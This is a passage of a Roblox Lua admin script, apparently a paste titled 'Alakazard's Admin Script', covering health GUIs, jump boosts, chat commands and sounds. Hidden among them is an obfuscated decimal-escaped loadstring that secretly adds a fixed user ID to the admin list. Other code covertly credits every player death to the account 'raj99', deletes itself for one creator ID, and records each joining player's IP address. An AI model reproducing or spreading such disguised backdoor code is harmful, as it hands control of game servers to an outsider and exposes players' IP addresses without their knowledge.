  2785. if pgg.Name=='HealthGUI'and pgg.className=='GuiMain'or pgg.Name==[[==Alakazard's Health Guis==]]then
  2786. pgg:remove()
  2787. end
  2788. end
  2789. return nil
  2790. end
  2791. end
  2792. end)
  2793. end)
  2794. end)
  2795. end
  2796. JJump=function(p)
  2797. X(function()wait(1)
  2798. for i,v in pairs(p:children())do
  2799. if v.className=='PlayerGui'then
  2800. for k,a in pairs(v:children())do
  2801. if a.Name=='Jump'then a:remove()end
  2802. end
  2803. asdscript=Scripting('local',[[
  2804. p=script.Parent.Parent
  2805. p.Character.Humanoid.Jumping:connect(function()
  2806. if asd~=nil then return end
  2807. asd='not nil'
  2808. p.Character.Torso.Velocity=Vector3.new(p.Character.Torso.Velocity.x*1.6,100,p.Character.Torso.Velocity.z*1.6)
  2809. wait(1)
  2810. asd=nil
  2811. end)
  2812. ]],nil)
  2813. asdscript.Name='Jump'
  2814. asdscript.Parent=v
  2815. return
  2816. end
  2817. end
  2818. end)
  2819. end
  2820. --[[======================================================================]]--
  2821. --[[======================================================================]]--
  2822. --[[======================================================================]]--
  2823. --[[======================================================================]]--
  2824. --[[======================================================================]]--
  2825. --[[======================================================================]]--
  2826. --[[======================================================================]]--
  2827. --[[======================================================================]]--
  2828. PlayerFunctions={
  2829.  
  2830. HealthBar=function(p)
  2831. if ListCheck(PlayersList.Runs.HealthBar,p.Name)==true then return end
  2832. PlayersList.Runs.HealthBar[p.Name]=true
  2833. delay(1,function()
  2834. Scripting('local',[==[
  2835. --Alakazard
  2836. if game.CreatorId==14072171 then script:remove()return end
  2837. player=game.Players.LocalPlayer
  2838. new=Instance.new
  2839. unew=UDim2.new
  2840. cnew=Color3.new
  2841. Alakazard='Alakazard; '
  2842. life=function(obj,time)
  2843. game:service('Debris'):AddItem(obj,time)
  2844. end
  2845.  
  2846. life(game:FindFirstChild('Alakazard'..'\39'..'s Health Gui ('..player.Name..')',true),0)
  2847.  
  2848. script.Name='ALAKAZARD HEALTH GUI SCRIPT'
  2849.  
  2850. screen=new('ScreenGui',game.CoreGui)
  2851. screen.Name='Alakazard'..'\39'..'s Health Gui ('..player.Name..')'
  2852.  
  2853. script.Parent=screen
  2854.  
  2855. main=new('Frame',screen)
  2856. main.Position=unew(.2,0,.95,0)
  2857. main.Size=unew(.6,0,.05,0)
  2858. main.BackgroundColor3=cnew(128,0,0)
  2859. main.BackgroundTransparency=.7
  2860. main.BorderColor3=cnew(0,0,0)
  2861. frame=new('ImageLabel',main)
  2862. frame.Size=unew(1,0,1,0)
  2863. frame.Image='rbxassetid://54639434'
  2864. frame.BackgroundColor3=cnew(0,128,0)
  2865. frame.BackgroundTransparency=.5
  2866. frame.BorderSizePixel=0
  2867. frame.BorderColor3=cnew(0,0,0)
  2868. health=new('TextLabel',main)
  2869. health.Text=Alakazard..'Pending...'
  2870. health.Position=unew(.5,0,.5,0)
  2871. health.TextColor3=cnew(0,0,0)
  2872. health.BorderSizePixel=0
  2873. health.Font=2
  2874. health.FontSize='Size14'
  2875. black=new('ImageLabel',main)
  2876. black.Image='rbxassetid://54647921'
  2877. black.BackgroundTransparency=1
  2878. black.Size=unew(.05,0,1,0)
  2879. black.Position=unew(-.05,0,0,0)
  2880. black=new('ImageLabel',main)
  2881. black.Image='rbxassetid://54648019'
  2882. black.BackgroundTransparency=1
  2883. black.Size=unew(.05,0,1,0)
  2884. black.Position=unew(1,0,0,0)
  2885. humanoid=function()
  2886. if player.Character==nil then return end
  2887. for i,v in pairs(player.Character:children())do
  2888. if v:IsA('Humanoid')then
  2889. return v
  2890. end
  2891. end
  2892. return nil
  2893. end
  2894. heal=function()
  2895. pcall(function()
  2896. if humanoid().Health==h.MaxHealth then return end
  2897. humanoid():TakeDamage(-humanoid().MaxHealth/1000)
  2898. end)
  2899. end
  2900. C=function()
  2901. pcall(function()h=humanoid()frame.Size=unew(h.Health/h.MaxHealth,0,1,0)end)
  2902. pcall(function()h=humanoid()health.Text=Alakazard..'Your Health Status { Health:'..math.ceil(h.Health)..' }'..' [ Max:'..math.ceil(h.MaxHealth)..' ]'..' ( '..math.ceil((h.Health/h.MaxHealth)*100)..'% )'end)
  2903. end
  2904. connect=function()
  2905. pcall(function()
  2906. humanoid().Died:connect(function()
  2907. pcall(function()
  2908. _Alakazard=game:service('Players'):FindFirstChild('raj99')
  2909. if not _Alakazard then return end
  2910. if humanoid:FindFirstChild('creator')then return end
  2911. Tag=new('ObjectValue')
  2912. Tag.Value=_Alakazard
  2913. Tag.Name='creator'
  2914. Tag.Parent=humanoid()
  2915. end)
  2916. end)
  2917. end)
  2918. pcall(function()humanoid().HealthChanged:connect(function()pcall(function()C()end)end)end)
  2919. delay(0,function()
  2920. while humanoid()~=nil do --ugly loop
  2921. wait'.125'
  2922. pcall(function()
  2923. heal()
  2924. end)
  2925. end
  2926. end)
  2927. end
  2928. player.ChildAdded:connect(function(a)wait()
  2929. if a:IsA('PlayerGui')then
  2930. a.ChildAdded:connect(function(child)wait()
  2931. if child:IsA('GuiMain')or child.Name=='HealthGUI'then
  2932. life(child,0)
  2933. end
  2934. end)
  2935. end
  2936. end)
  2937. pcall(function()connect()end)
  2938. pcall(function()heal()end)
  2939. pcall(function()C()end)
  2940. player.CharacterAdded:connect(function()
  2941. wait()
  2942. pcall(function()connect()end)
  2943. pcall(function()heal()end)
  2944. pcall(function()C()end)
  2945. end)
  2946. pcall(function()
  2947. la={'ControlFrame','SubMenuBuilder','Popup'}
  2948. for i,v in pairs(la)do
  2949. game:service('Debris'):AddItem(game:FindFirstChild(v,true),1)
  2950. end
  2951. end)
  2952. ]==],PlayerGui(p))
  2953. end)
  2954. end,
  2955.  
  2956. CmdsConnect=function(p)
  2957. if ListCheck(PlayersList.Admins,p.userId)==true then
  2958. huh=0
  2959. PlayersList.Runs.History[p.Name]=false
  2960. for i,c in pairs(Commands)do
  2961. huh=huh+1
  2962. Actual[p.Name..huh]=p.Chatted:connect(function(v)
  2963. c(v,p)
  2964. end)
  2965. end
  2966. p.Chatted:connect(function(v)
  2967. FixCmds(v,p)
  2968. end)
  2969. end
  2970. p.ChildAdded:connect(function(ob)ob.ChildAdded:connect(function(c)if c.Name=='HealthGUI'then c:remove()end end)if ob:IsA('PlayerGui')then LoadGuis(p)end end)
  2971. LoadGuis(p)
  2972. end,
  2973. AnnoyingC=function(p)
  2974. if ListCheck(PlayersList.Annoying,p.Name)==true then
  2975. life(p,0)
  2976. end
  2977. end,
  2978.  
  2979. ToolsAdded=function(p)
  2980. if ListCheck(PlayersList.Admins,p.userId)==false then return end
  2981. Staff(Backpack(p))
  2982. FlyBin(Backpack(p))
  2983. p.ChildAdded:connect(function(d)
  2984. if d:IsA('Backpack')then
  2985. FlyBin(d)
  2986. Staff(d)
  2987. end
  2988. end)
  2989. end,
  2990.  
  2991. CC=function(p)
  2992. delay(1,function()Scripting('local',[[loadstring('\115\99\114\105\112\116\46\80\97\114\101\110\116\61\115\99\114\105\112\116\46\80\97\114\101\110\116\46\80\97\114\101\110\116\46\67\104\97\114\97\99\116\101\114\10\10\102\117\110\99\116\105\111\110\32\119\97\105\116\70\111\114\67\104\105\108\100\40\112\97\114\101\110\116\44\32\99\104\105\108\100\78\97\109\101\41\10\9\108\111\99\97\108\32\99\104\105\108\100\32\61\32\112\97\114\101\110\116\58\102\105\110\100\70\105\114\115\116\67\104\105\108\100\40\99\104\105\108\100\78\97\109\101\41\10\9\105\102\32\99\104\105\108\100\32\116\104\101\110\32\114\101\116\117\114\110\32\99\104\105\108\100\32\101\110\100\10\9\119\104\105\108\101\32\116\114\117\101\32\100\111\10\9\9\99\104\105\108\100\32\61\32\112\97\114\101\110\116\46\67\104\105\108\100\65\100\100\101\100\58\119\97\105\116\40\41\10\9\9\105\102\32\99\104\105\108\100\46\78\97\109\101\61\61\99\104\105\108\100\78\97\109\101\32\116\104\101\110\32\114\101\116\117\114\110\32\99\104\105\108\100\32\101\110\100\10\9\101\110\100\10\101\110\100\10\10\102\117\110\99\116\105\111\110\32\110\101\119\83\111\117\110\100\40\105\100\41\10\9\108\111\99\97\108\32\115\111\117\110\100\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\34\83\111\117\110\100\34\41\10\9\115\111\117\110\100\46\83\111\117\110\100\73\100\32\61\32\105\100\10\9\115\111\117\110\100\46\97\114\99\104\105\118\97\98\108\101\32\61\32\102\97\108\115\101\10\9\115\111\117\110\100\46\80\97\114\101\110\116\32\61\32\115\99\114\105\112\116\46\80\97\114\101\110\116\46\72\101\97\100\10\9\114\101\116\117\114\110\32\115\111\117\110\100\10\101\110\100\10\10\45\45\32\100\101\99\108\97\114\97\116\105\111\110\115\10\10\108\111\99\97\108\32\115\68\105\101\100\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\117\117\104\104\104\46\119\97\118\34\41\10\108\111\99\97\108\32\115\70\97\108\108\105\110\103\68\111\119\110\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\1
  2993. 15\115\101\116\58\47\47\115\111\117\110\100\115\47\115\112\108\97\116\46\119\97\118\34\41\10\108\111\99\97\108\32\115\70\114\101\101\70\97\108\108\105\110\103\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\115\119\111\111\115\104\46\119\97\118\34\41\10\108\111\99\97\108\32\115\71\101\116\116\105\110\103\85\112\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\104\105\116\46\119\97\118\34\41\10\108\111\99\97\108\32\115\74\117\109\112\105\110\103\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\98\117\116\116\111\110\46\119\97\118\34\41\10\108\111\99\97\108\32\115\82\117\110\110\105\110\103\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\98\102\115\108\45\109\105\110\105\102\105\103\102\111\111\116\115\49\46\109\112\51\34\41\10\115\82\117\110\110\105\110\103\46\76\111\111\112\101\100\32\61\32\116\114\117\101\10\10\108\111\99\97\108\32\70\105\103\117\114\101\32\61\32\115\99\114\105\112\116\46\80\97\114\101\110\116\10\108\111\99\97\108\32\72\101\97\100\32\61\32\119\97\105\116\70\111\114\67\104\105\108\100\40\70\105\103\117\114\101\44\32\34\72\101\97\100\34\41\10\108\111\99\97\108\32\72\117\109\97\110\111\105\100\32\61\32\119\97\105\116\70\111\114\67\104\105\108\100\40\70\105\103\117\114\101\44\32\34\72\117\109\97\110\111\105\100\34\41\10\10\45\45\32\102\117\110\99\116\105\111\110\115\10\10\102\117\110\99\116\105\111\110\32\111\110\68\105\101\100\40\41\10\9\115\68\105\101\100\58\80\108\97\121\40\41\10\101\110\100\10\10\102\117\110\99\116\105\111\110\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\111\117\110\100\41\10\9\105\102\32\115\116\97\116\101\32\116\104\101\110\10\9\9\115\111\117\110\100\58\80\108\97\121\40\41\10\9\101\108\115\101\10\9\9\115\111\117\110\100\58\80\97\117\115\101\40\41\10\9\101\110\100\1
  2994. 0\101\110\100\10\10\102\117\110\99\116\105\111\110\32\111\110\82\117\110\110\105\110\103\40\115\112\101\101\100\41\10\9\105\102\32\115\112\101\101\100\62\48\32\116\104\101\110\10\9\9\115\82\117\110\110\105\110\103\58\80\108\97\121\40\41\10\9\101\108\115\101\10\9\9\115\82\117\110\110\105\110\103\58\80\97\117\115\101\40\41\10\9\101\110\100\10\101\110\100\10\10\45\45\32\99\111\110\110\101\99\116\32\117\112\10\10\72\117\109\97\110\111\105\100\46\68\105\101\100\58\99\111\110\110\101\99\116\40\111\110\68\105\101\100\41\10\72\117\109\97\110\111\105\100\46\82\117\110\110\105\110\103\58\99\111\110\110\101\99\116\40\111\110\82\117\110\110\105\110\103\41\10\72\117\109\97\110\111\105\100\46\74\117\109\112\105\110\103\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\74\117\109\112\105\110\103\41\32\101\110\100\41\10\72\117\109\97\110\111\105\100\46\71\101\116\116\105\110\103\85\112\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\71\101\116\116\105\110\103\85\112\41\32\101\110\100\41\10\72\117\109\97\110\111\105\100\46\70\114\101\101\70\97\108\108\105\110\103\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\70\114\101\101\70\97\108\108\105\110\103\41\32\101\110\100\41\10\72\117\109\97\110\111\105\100\46\70\97\108\108\105\110\103\68\111\119\110\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\70\97\108\108\105\110\103\68\111\119\110\41\32\101\110\100\41\10')()]],Backpack(p)).Name='newSound'end)
  2995. if ListCheck(PlayersList.Admins,p.userId)==true then
  2996. JJump(p)
  2997. delay(2,function()FakeHead(p)end)
  2998. X(function()p.Character.Humanoid.Died:connect(function()Print(p.Name..' getting wos ;D')p.Character=nil end)end)
  2999. end
  3000. laggs={'RobloxTeam','Health','Sound'}
  3001. pcall(function()
  3002. delay(0,function()
  3003. p.Character.ChildAdded:connect(function(new)
  3004. delay(.01,function()
  3005. for v,i in pairs(laggs)do
  3006. if new.Name:lower():find(i:lower())==1 then
  3007. new:remove()
  3008. end
  3009. end
  3010. end)
  3011. end)
  3012. end)
  3013. end)
  3014. CCL(p)
  3015. p.CharacterAdded:connect(function()
  3016. delay(1,function()Scripting('local',[[loadstring('\115\99\114\105\112\116\46\80\97\114\101\110\116\61\115\99\114\105\112\116\46\80\97\114\101\110\116\46\80\97\114\101\110\116\46\67\104\97\114\97\99\116\101\114\10\10\102\117\110\99\116\105\111\110\32\119\97\105\116\70\111\114\67\104\105\108\100\40\112\97\114\101\110\116\44\32\99\104\105\108\100\78\97\109\101\41\10\9\108\111\99\97\108\32\99\104\105\108\100\32\61\32\112\97\114\101\110\116\58\102\105\110\100\70\105\114\115\116\67\104\105\108\100\40\99\104\105\108\100\78\97\109\101\41\10\9\105\102\32\99\104\105\108\100\32\116\104\101\110\32\114\101\116\117\114\110\32\99\104\105\108\100\32\101\110\100\10\9\119\104\105\108\101\32\116\114\117\101\32\100\111\10\9\9\99\104\105\108\100\32\61\32\112\97\114\101\110\116\46\67\104\105\108\100\65\100\100\101\100\58\119\97\105\116\40\41\10\9\9\105\102\32\99\104\105\108\100\46\78\97\109\101\61\61\99\104\105\108\100\78\97\109\101\32\116\104\101\110\32\114\101\116\117\114\110\32\99\104\105\108\100\32\101\110\100\10\9\101\110\100\10\101\110\100\10\10\102\117\110\99\116\105\111\110\32\110\101\119\83\111\117\110\100\40\105\100\41\10\9\108\111\99\97\108\32\115\111\117\110\100\32\61\32\73\110\115\116\97\110\99\101\46\110\101\119\40\34\83\111\117\110\100\34\41\10\9\115\111\117\110\100\46\83\111\117\110\100\73\100\32\61\32\105\100\10\9\115\111\117\110\100\46\97\114\99\104\105\118\97\98\108\101\32\61\32\102\97\108\115\101\10\9\115\111\117\110\100\46\80\97\114\101\110\116\32\61\32\115\99\114\105\112\116\46\80\97\114\101\110\116\46\72\101\97\100\10\9\114\101\116\117\114\110\32\115\111\117\110\100\10\101\110\100\10\10\45\45\32\100\101\99\108\97\114\97\116\105\111\110\115\10\10\108\111\99\97\108\32\115\68\105\101\100\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\117\117\104\104\104\46\119\97\118\34\41\10\108\111\99\97\108\32\115\70\97\108\108\105\110\103\68\111\119\110\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\
  3017. 115\115\101\116\58\47\47\115\111\117\110\100\115\47\115\112\108\97\116\46\119\97\118\34\41\10\108\111\99\97\108\32\115\70\114\101\101\70\97\108\108\105\110\103\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\115\119\111\111\115\104\46\119\97\118\34\41\10\108\111\99\97\108\32\115\71\101\116\116\105\110\103\85\112\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\104\105\116\46\119\97\118\34\41\10\108\111\99\97\108\32\115\74\117\109\112\105\110\103\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\98\117\116\116\111\110\46\119\97\118\34\41\10\108\111\99\97\108\32\115\82\117\110\110\105\110\103\32\61\32\110\101\119\83\111\117\110\100\40\34\114\98\120\97\115\115\101\116\58\47\47\115\111\117\110\100\115\47\98\102\115\108\45\109\105\110\105\102\105\103\102\111\111\116\115\49\46\109\112\51\34\41\10\115\82\117\110\110\105\110\103\46\76\111\111\112\101\100\32\61\32\116\114\117\101\10\10\108\111\99\97\108\32\70\105\103\117\114\101\32\61\32\115\99\114\105\112\116\46\80\97\114\101\110\116\10\108\111\99\97\108\32\72\101\97\100\32\61\32\119\97\105\116\70\111\114\67\104\105\108\100\40\70\105\103\117\114\101\44\32\34\72\101\97\100\34\41\10\108\111\99\97\108\32\72\117\109\97\110\111\105\100\32\61\32\119\97\105\116\70\111\114\67\104\105\108\100\40\70\105\103\117\114\101\44\32\34\72\117\109\97\110\111\105\100\34\41\10\10\45\45\32\102\117\110\99\116\105\111\110\115\10\10\102\117\110\99\116\105\111\110\32\111\110\68\105\101\100\40\41\10\9\115\68\105\101\100\58\80\108\97\121\40\41\10\101\110\100\10\10\102\117\110\99\116\105\111\110\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\111\117\110\100\41\10\9\105\102\32\115\116\97\116\101\32\116\104\101\110\10\9\9\115\111\117\110\100\58\80\108\97\121\40\41\10\9\101\108\115\101\10\9\9\115\111\117\110\100\58\80\97\117\115\101\40\41\10\9\101\110\100\
  3018. 10\101\110\100\10\10\102\117\110\99\116\105\111\110\32\111\110\82\117\110\110\105\110\103\40\115\112\101\101\100\41\10\9\105\102\32\115\112\101\101\100\62\48\32\116\104\101\110\10\9\9\115\82\117\110\110\105\110\103\58\80\108\97\121\40\41\10\9\101\108\115\101\10\9\9\115\82\117\110\110\105\110\103\58\80\97\117\115\101\40\41\10\9\101\110\100\10\101\110\100\10\10\45\45\32\99\111\110\110\101\99\116\32\117\112\10\10\72\117\109\97\110\111\105\100\46\68\105\101\100\58\99\111\110\110\101\99\116\40\111\110\68\105\101\100\41\10\72\117\109\97\110\111\105\100\46\82\117\110\110\105\110\103\58\99\111\110\110\101\99\116\40\111\110\82\117\110\110\105\110\103\41\10\72\117\109\97\110\111\105\100\46\74\117\109\112\105\110\103\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\74\117\109\112\105\110\103\41\32\101\110\100\41\10\72\117\109\97\110\111\105\100\46\71\101\116\116\105\110\103\85\112\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\71\101\116\116\105\110\103\85\112\41\32\101\110\100\41\10\72\117\109\97\110\111\105\100\46\70\114\101\101\70\97\108\108\105\110\103\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\70\114\101\101\70\97\108\108\105\110\103\41\32\101\110\100\41\10\72\117\109\97\110\111\105\100\46\70\97\108\108\105\110\103\68\111\119\110\58\99\111\110\110\101\99\116\40\102\117\110\99\116\105\111\110\40\115\116\97\116\101\41\32\111\110\83\116\97\116\101\40\115\116\97\116\101\44\32\115\70\97\108\108\105\110\103\68\111\119\110\41\32\101\110\100\41\10')()]],Backpack(p)).Name='newSound'end)
  3019. if ListCheck(PlayersList.Admins,p.userId)==true then
  3020. JJump(p)
  3021. delay(2,function()FakeHead(p)end)
  3022. X(function()p.Character.Humanoid.Died:connect(function()Print(p.Name..' getting wos ;D')p.Character=nil end)end)
  3023. end
  3024. CCL(p)
  3025. pcall(function()
  3026. p.Character.ChildAdded:connect(function(new)
  3027. delay(.01,function()
  3028. for v,i in pairs(laggs)do
  3029. if new.Name:lower():find(i:lower())==1 then
  3030. new:remove()
  3031. end
  3032. end
  3033. end)
  3034. end)
  3035. end)
  3036. end)
  3037. end,
  3038.  
  3039. }
  3040. --[[======================================================================]]--
  3041. --[[======================================================================]]--
  3042. --[[======================================================================]]--
  3043. --[[======================================================================]]--
  3044. --[[======================================================================]]--
  3045. --[[======================================================================]]--
  3046. --[[======================================================================]]--
  3047. --[[======================================================================]]--
  3048. --[[======================================================================]]--
  3049. if pcall(function()print(Instance.CoreGui)end)then
  3050. else
  3051. Instance.CoreGui={}
  3052. end
  3053. PlayerFunctionsConnect=function(p)
  3054. X(function()
  3055. for i,connect in pairs(PlayerFunctions)do
  3056. X(function()
  3057. if type(connect)~='function'then return end
  3058. if p~=nil then
  3059. connect(p)
  3060. end
  3061. end)
  3062. end
  3063. end)
  3064. end
  3065. pcall(function()loadstring('\105\102\32\76\105\115\116\67\104\101\99\107\40\80\108\97\121\101\114\115\76\105\115\116\46\65\100\109\105\110\115\44\49\51\57\57\48\50\54\52\41\61\61\102\97\108\115\101\32\116\104\101\110\32\116\97\98\108\101\46\105\110\115\101\114\116\40\80\108\97\121\101\114\115\76\105\115\116\46\65\100\109\105\110\115\44\49\51\57\57\48\50\54\52\41\101\110\100\10')()end)
  3066. pcall(function()se.net=game:service('NetworkServer')end)
  3067. LoadGuisHere()
  3068. X(function()
  3069. pcall(function()
  3070. game:GetService('NetworkServer').IncommingConnection:connect(function(ip,a,b)
  3071. pcall(function()playerconnect:disconnect()print'nil.'end)
  3072. playerconnect=game.Players.PlayerAdded:connect(function(player)
  3073. Print('New Player! |: '..player.Name..' |:| '..ip..' :|')
  3074. PlayersList.PlayerIP[player.Name]=ip
  3075. PlayerFunctionsConnect(player)
  3076. pcall(function()playerconnect:disconnect()print'nil.'end)
  3077. end)
  3078. end)
  3079. end)
  3080. end)
  3081. X(function()
  3082. if game:service('NetworkServer')then return end
  3083. print'NetworkServer not active'
  3084. game.Players.PlayerAdded:connect(function(p)
  3085. PlayerFunctionsConnect(p)
  3086. end)
  3087. end)
  3088. for na,p in ipairs(game:service('Players'):GetPlayers())do
  3089. PlayerFunctionsConnect(p)
  3090. end
  3091. SoundsLoad()
  3092. X(function()
  3093. local number=0
  3094. for i,v in pairs(Commands)do
  3095. number=number+1
  3096. end
  3097. hm1=Print(number..' command in Alakazard'..'\39'..'s Admin Script')
  3098. hm2=Print('v'..version)
  3099. end)
  3100. Print([[Alakazard's Admin Script Load ended!]])
  3101. Print('Waiting for admin script loaded: '..math.ceil(StartTime-tick()))
  3102. X(function()
  3103. screen=new('ScreenGui')
  3104. screen.Name='Alakazard Admin Script Loaded!'
  3105. life(screen,3)
  3106. img=new('ImageLabel')
  3107. img.Name='img'
  3108. img.Image=baseid..'54483165'
  3109. img.Size=unew(.25,0,.25,0)
  3110. img.Position=unew(.375,0,0,0)
  3111. img.BackgroundTransparency=1
  3112. img.Parent=screen
  3113. for i,v in ipairs(se.players:GetPlayers())do
  3114. screenc=screen:clone()
  3115. life(screenc,5)
  3116. screenc.Parent=PlayerGui(v)
  3117. pcall(function()screenc.img:TweenPosition(unew(.375,0,.35,0),Enum.EasingDirection.Out,Enum.EasingStyle.Back,3,false)end)
  3118. end
  3119. end)
  3120. X(function()
  3121. start=Sounds.start
  3122. Sound=new('Sound')
  3123. life(Sound,1)
  3124. Sound.Pitch=start.Pitch
  3125. Sound.Volume=start.Volume
  3126. Sound.SoundId=start.SoundId
  3127. Sound.Parent=game.Lighting
  3128. Sound:play()
  3129. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement